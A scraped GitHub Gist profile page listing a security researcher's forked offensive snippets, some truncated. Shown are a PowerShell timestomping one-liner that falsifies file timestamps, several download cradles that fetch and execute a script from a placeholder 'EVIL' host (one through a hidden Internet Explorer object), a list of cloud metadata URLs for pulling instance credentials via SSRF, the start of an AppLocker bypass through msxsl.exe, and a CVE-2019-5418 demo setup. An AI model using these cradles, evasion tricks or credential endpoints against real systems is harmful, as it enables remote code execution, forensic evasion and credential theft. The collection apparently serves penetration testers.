Skip to content

Instantly share code, notes, and snippets.

View nuryslyrt's full-sized avatar
🌟
Discover Stars!

Nur Gucu nuryslyrt

🌟
Discover Stars!
170 followers · 244 following
View GitHub Profile
@nuryslyrt
nuryslyrt / gist:fb8e281eb24711adf137a6cfbc67ed45
Created June 15, 2018 14:14 — forked from obscuresec/gist:7b0cf71d7a8dd5e7b54c
PowerShell TimeStomp
PowerShell.exe -com {$file=(gi c:\demo\test.txt);$date='01/03/2006 12:12 pm';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date}
@nuryslyrt
nuryslyrt / DownloadCradles.ps1
Created June 15, 2018 14:21 — forked from HarmJ0y/DownloadCradles.ps1
Download Cradles
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
@nuryslyrt
nuryslyrt / cloud_metadata.txt
Created July 2, 2018 12:48 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@nuryslyrt
nuryslyrt / customers.xml
Created July 18, 2018 07:08 — forked from gattacker/customers.xml
AppLocker bypass by msxsl.exe
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="script.xsl" ?>
<customers>
<customer>
<name>Microsoft</name>
</customer>
</customers>
@nuryslyrt
nuryslyrt / README.md
Created April 5, 2019 10:15 — forked from ajxchapman/README.md
CVE-2019-5418 Demo

CVE-2019-5418 Demo

Build Docker container: Dockerfile

FROM ruby:2.5
RUN apt-get update -qq && apt-get install -y nodejs postgresql-client
RUN mkdir /myapp
WORKDIR /myapp
COPY Gemfile /myapp/Gemfile
@nuryslyrt
nuryslyrt / JavascriptRecon.md
Created February 13, 2021 17:52
My Javascript Recon Process - BugBounty

Description

This is a simple guide to perform javascript recon in the bugbounty

Steps

  • The first step is to collect possibly several javascript files (more files = more paths,parameters -> more vulns)
@nuryslyrt
nuryslyrt / cors.md
Created June 8, 2021 00:25 — forked from jesperorb/cors.md
Handle CORS Client-side

Handle CORS Client-side

Cross-origin resource sharing (CORS) is a mechanism that allows restricted resources (e.g. fonts) on a web page to be requested from another domain outside the domain from which the first resource was served. This is set on the server-side and there is nothing you can do from the client-side to change that setting, that is up to the server/API. There are some ways to get around it tho.

Sources : MDN - HTTP Access Control | Wiki - CORS

CORS is set server-side by supplying each request with additional headers which allow requests to be requested outside of the own domain, for example to your localhost. This is primarily set by the header:

Access-Control-Allow-Origin